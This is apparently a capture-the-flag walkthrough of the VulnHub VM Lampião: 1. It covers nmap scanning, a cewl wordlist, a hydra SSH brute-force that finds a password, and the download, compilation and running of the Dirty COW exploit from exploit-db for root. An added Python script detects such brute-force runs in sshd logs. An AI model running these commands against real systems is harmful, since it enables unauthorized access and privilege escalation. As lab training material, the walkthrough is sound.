This post documents the complete walkthrough of Lampião: 1, a boot2root VM created by Tiago Tavares, and hosted at VulnHub. If you are uncomfortable with spoilers, please stop reading now.


Background

“Captain” Virgulino Ferreira da Silva, better known as Lampião, was the most famous bandit leader of the Cangaço. The aim is to get root.

Information Gathering

Let’s start with an nmap scan to establish the services available on the host.

# nmap -n -v -Pn -p- -A --reason -oN nmap.txt 192.168.10.130
...
PORT     STATE SERVICE REASON         VERSION
22/tcp   open  ssh     syn-ack ttl 64 OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.7 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   1024 46:b1:99:60:7d:81:69:3c:ae:1f:c7:ff:c3:66:e3:10 (DSA)
|   2048 f3:e8:88:f2:2d:d0:b2:54:0b:9c:ad:61:33:59:55:93 (RSA)
|   256 ce:63:2a:f7:53:6e:46:e2:ae:81:e3:ff:b7:16:f4:52 (ECDSA)
|_  256 c6:55:ca:07:37:65:e3:06:c1:d6:5b:77:dc:23:df:cc (ED25519)
80/tcp   open  http?   syn-ack ttl 64
| fingerprint-strings:
|   NULL:
|     _____ _ _ | |_|/ ___ ___ __ _ ___ _ _ | \x20| __/ (_| __ \x20|_| |_ | ___/ __| |___/ ___|__,_|___/__, ( ) | |___/ | ______ _ _ _ | ___(_) | | | | | \x20/ _` | / _ / _` | | | |/ _` | | |_ __,_|__,_|_| |_|
1898/tcp open  http    syn-ack ttl 64 Apache httpd 2.4.7 ((Ubuntu))
|_http-favicon: Unknown favicon MD5: CF2445DCB53A031C02F9B57E2199BC03
|_http-generator: Drupal 7 (http://drupal.org)
| http-methods:
|_  Supported Methods: GET HEAD POST OPTIONS
| http-robots.txt: 36 disallowed entries (15 shown)
| /includes/ /misc/ /modules/ /profiles/ /scripts/
| /themes/ /CHANGELOG.txt /cron.php /INSTALL.mysql.txt
| /INSTALL.pgsql.txt /INSTALL.sqlite.txt /install.php /INSTALL.txt
|_/LICENSE.txt /MAINTAINERS.txt
|_http-server-header: Apache/2.4.7 (Ubuntu)
|_http-title: Lampi\xC3\xA3o

nmap finds 22/tcp, 80/tcp and 1898/tcp open, and there’s something interesting behind 80/tcp: the service answers the NULL probe with an ASCII-art banner.

“Fi duma égua” is a not-so-elegant word for referring to someone. I leave it for the curious reader to find out what it means.

Drupal

Another service worth exploring is Drupal, which runs behind 1898/tcp. Here’s how it looks.

To be honest, I’m always excited to see a non-English language on display, because that means I can generate a wordlist from it. In my experience there’s always a good chance of getting a password that way.

Let’s use cewl to generate a wordlist from the post “Lampião, herói ou vilão do Sertão?”. The command goes like this.

# cewl -w cewl.txt http://192.168.10.130:1898/?q=node/1
# wc -l cewl.txt
835 cewl.txt

Hail Hydra

Notice the two usernames below: tiago and eder.

Let’s put them into a username list and go with hydra and the generated wordlist. Perhaps we can get lucky with SSH on our first attempt?

# echo tiago > usernames.txt
# echo eder >> usernames.txt
# hydra -L usernames.txt -P cewl.txt -f -e nsr -o hydra.txt -t 4 ssh://192.168.10.130
[22][ssh] host: 192.168.10.130   login: tiago   password: Virgulino
[STATUS] attack finished for 192.168.10.130 (valid pair found)
1 of 1 target successfully completed, 1 valid password found

Lucky indeed.
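From the defender’s side, a run like the hydra one above is loud: sshd logs a “Failed password” line for every guess and an “Accepted password” line for the hit. The script below is an added example (not part of the original post) that parses constructed auth.log lines and flags any source that racks up a burst of failures, noting when an accepted login follows the burst, which is the signature of a guessed password. The log sample, the host name and the source addresses are made up for the illustration.

```python
import re
from collections import defaultdict
from datetime import datetime

# Constructed sample of sshd auth.log lines (not taken from the VM).
SAMPLE_AUTH_LOG = """\
Jul 13 01:10:01 lampiao sshd[2101]: Failed password for tiago from 192.168.10.128 port 40110 ssh2
Jul 13 01:10:02 lampiao sshd[2103]: Failed password for tiago from 192.168.10.128 port 40112 ssh2
Jul 13 01:10:02 lampiao sshd[2105]: Failed password for invalid user eder from 192.168.10.128 port 40114 ssh2
Jul 13 01:10:03 lampiao sshd[2107]: Failed password for tiago from 192.168.10.128 port 40116 ssh2
Jul 13 01:10:04 lampiao sshd[2109]: Failed password for tiago from 192.168.10.128 port 40118 ssh2
Jul 13 01:10:05 lampiao sshd[2111]: Accepted password for tiago from 192.168.10.128 port 40120 ssh2
Jul 13 01:25:40 lampiao sshd[2201]: Failed password for tiago from 192.168.10.50 port 51000 ssh2
Jul 13 01:40:00 lampiao sshd[2250]: Accepted publickey for tiago from 192.168.10.50 port 51002 ssh2
"""

# Matches both "Failed password for <user>" and "Failed password for invalid user <user>".
LINE_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d+ \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
    r"(?P<result>Failed|Accepted) \w+ for (?:invalid user )?"
    r"(?P<user>\S+) from (?P<src>\S+) port \d+"
)

def parse_events(log_text):
    """Yield (timestamp, result, user, src) for every sshd login line."""
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if m:  # syslog timestamps carry no year; only deltas matter here
            yield datetime.strptime(m["ts"], "%b %d %H:%M:%S"), m["result"], m["user"], m["src"]

def find_bruteforce(log_text, threshold=4, window_s=60):
    """Return {src: {"failures", "users", "success"}} for each source with at
    least `threshold` failed logins inside a sliding window of `window_s`
    seconds; "success" holds the user of an Accepted login that follows the burst."""
    fails = defaultdict(list)   # src -> timestamps of failures still inside the window
    users = defaultdict(set)    # src -> usernames tried from that source
    alerts = {}
    for ts, result, user, src in parse_events(log_text):
        fails[src] = [t for t in fails[src] if (ts - t).total_seconds() <= window_s]
        users[src].add(user)
        if result == "Failed":
            fails[src].append(ts)
            if len(fails[src]) >= threshold:
                a = alerts.setdefault(src, {"users": users[src], "success": None})
                a["failures"] = max(a.get("failures", 0), len(fails[src]))
        elif src in alerts and fails[src]:
            alerts[src]["success"] = user  # accepted login right after a burst of failures
    return alerts

if __name__ == "__main__":
    for src, a in find_bruteforce(SAMPLE_AUTH_LOG).items():
        print(f"{src}: {a['failures']} failures, users={sorted(a['users'])}, success={a['success']}")
```

A single failure from 192.168.10.50 stays below the threshold, so only the dictionary-attack source is reported.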

Low-Privilege Shell

Not too shabby.

Privilege Escalation

Let’s perform some basic enumeration to determine what we’re dealing with.

$ uname -a
Linux lampiao 4.4.0-31-generic #50~14.04.1-Ubuntu SMP Wed Jul 13 01:06:37 UTC 2016 i686 i686 i686 GNU/Linux
$ lsb_release -a
No LSB modules are available.
Distributor ID: Ubuntu
Description:    Ubuntu 14.04.5 LTS
Release:        14.04
Codename:       trusty

I’m going to use a script that suggests local privilege escalation exploits relevant to this distribution and kernel.

$ wget -q -O /tmp/linux-exploit-suggester.sh https://raw.githubusercontent.com/mzet-/linux-exploit-suggester/master/linux-exploit-suggester.sh
$ chmod +x /tmp/linux-exploit-suggester.sh
$ /tmp/linux-exploit-suggester.sh
...
[+] [CVE-2016-5195] dirtycow 2

   Details: https://github.com/dirtycow/dirtycow.github.io/wiki/VulnerabilityDetails
   Tags: debian=7|8,RHEL=5|6|7,[ ubuntu=14.04|12.04 ],ubuntu=10.04{kernel:2.6.32-21-generic},ubuntu=16.04{kernel:4.4.0-21-generic}
   Download URL: https://www.exploit-db.com/download/40839
   ext-url: https://www.exploit-db.com/download/40847.cpp
   Comments: For RHEL/CentOS see exact vulnerable versions here: https://access.redhat.com/sites/default/files/rh-cve-2016-5195_5.sh

Let’s test the exploit out.

$ wget -q -O /tmp/40847.cpp https://www.exploit-db.com/download/40847.cpp
$ g++ -Wall -pedantic -O2 -std=c++11 -pthread -o dcow 40847.cpp -lutil
$ ./dcow -s

Boom.

What’s the Flag (WTF)?

I wonder what the significance of lampiao.jpg is to the flag. Here’s what lampiao.jpg looks like.

Afterthought

The VM isn’t hard. Don’t think too deep or too far, and don’t go down the rabbit hole. Tiago (the creator of this VM) laid down a bunch of teasers that may steer you off course.

One good example is qrc.png in the Drupal home directory.

It decodes to “Try harder! muahuahua”.